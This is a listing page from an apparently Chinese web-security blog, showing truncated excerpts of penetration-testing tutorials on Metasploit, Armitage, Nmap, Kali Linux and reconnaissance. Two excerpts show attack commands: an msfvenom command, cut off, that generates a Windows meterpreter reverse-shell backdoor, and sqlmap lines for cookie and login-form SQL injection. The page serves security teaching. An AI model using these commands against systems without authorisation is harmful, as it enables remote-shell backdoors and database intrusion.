web安全 第44页

2020-01-11hush阅读(1215)赞(0)

在本章中，我们将了解如何将Armitage GUI用于Metasploit。Armitage是Metasploit的补充工具。它可以可视化目标。Armitage与Kali发行版合并。如果需要进行渗透测试，则必须同时使用这两个工具。 让我们学...

2020-01-09hush阅读(1031)赞(0)

首先，在Kali中打开Metasploit控制台。您可以按照以下路径进行操作：应用程序→开发工具→Metasploit。 打开Metasploit控制台后，您将看到以下屏幕。红色下划线突出显示了Metasploit的版本。 帮助命令 如果在...

2020-01-05hush阅读(1241)赞(0)

Network Mapper（简称Nmap）是一个免费的开源实用程序，用于网络发现和漏洞扫描。安全专业人员使用Nmap发现在其环境中运行的设备。Nmap还可以揭示服务以及每个主机正在服务的端口，从而暴露出潜在的安全风险。在最基本的层面上，考...

2020-01-04hush阅读(969)赞(0)

Metasploit框架是一个开放源代码项目，为研究漏洞和开发代码提供了公共资源，从而使安全专业人员能够渗透自己的网络并识别安全风险和漏洞。Kali Linux上可以使用社区版本的Metasploit。迄今为止，Metasploit是世界上...

2020-01-03hush阅读(618)赞(0)

Kali桌面上有一些选项卡，您应该首先记下它们并熟悉它们。应用程序标签，位置标签和Kali Linux扩展。 应用程序选项卡 –提供预安装在Kali Linux上的所有应用程序和工具的图形下拉列表。查看“ 应用程序”选项卡是熟悉功能丰富的K...

2019-12-16hush阅读(815)赞(0)

1.系统的信息收集 1.1.CDN 什么是CND？ 内容分发式服务 CDN的优势？ 隐藏源主机ip，降低延迟，提高服务响应速度，增加网络冗余，减小主机服务器压力。 1.2真实ip查询 1判断目标是否使用了CDN 利用在线网站 http://...

2019-12-14hush阅读(882)赞(0)

方法：

2019-12-10hush阅读(1031)赞(0)

0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马： msfvenom -p windows/meterpreter/reverse_tcp lhost...

2019-12-10hush阅读(930)赞(0)

cookie注入：sqlmap.py -u 注入点 –cookie “参数” –tables –level 2 POST登录框注入：sqlmap.py -r 从文件读取数据 -p ...